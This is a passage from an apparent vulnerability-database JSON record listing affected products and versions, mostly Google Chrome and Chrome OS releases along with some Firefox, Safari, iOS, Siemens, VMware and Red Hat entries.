        "vendor": "mozilla",
        "version": "39.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.400.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.592.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.902.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.444.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.39"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.15"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.548.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.640.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.23"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.020"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.103"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.759.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.4"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.84"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.8"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.4"
      },
      {
        "model": "safari",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.69"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16"
      },
      {
        "model": "simatic ipc677d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1661.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.662.0"
      },
      {
        "model": "iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.149"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.833.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.810.0"
      },
      {
        "model": "simotion p320-4e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.41"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.649.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.316.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.692.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.17"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "13.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.83"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.17"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.93"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.630.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.885.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.569.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.89"
      },
      {
        "model": "simatic itp3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.962.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.295.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.318.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.619.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1004"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.100"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1033"
      },
      {
        "model": "simatic ipc627c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1044"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1679.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.51"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.539.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.661.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.91"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.474.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.110"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.1"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.883.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.306"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.348.0"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.2"
      },
      {
        "model": "windows server r2 for itanium-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "20.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.120"
      },
      {
        "model": "simatic itp1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.705.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1016.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.395.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.118"
      },
      {
        "model": "ruggedcom rx1400 vpe",
        "scope": "eq",
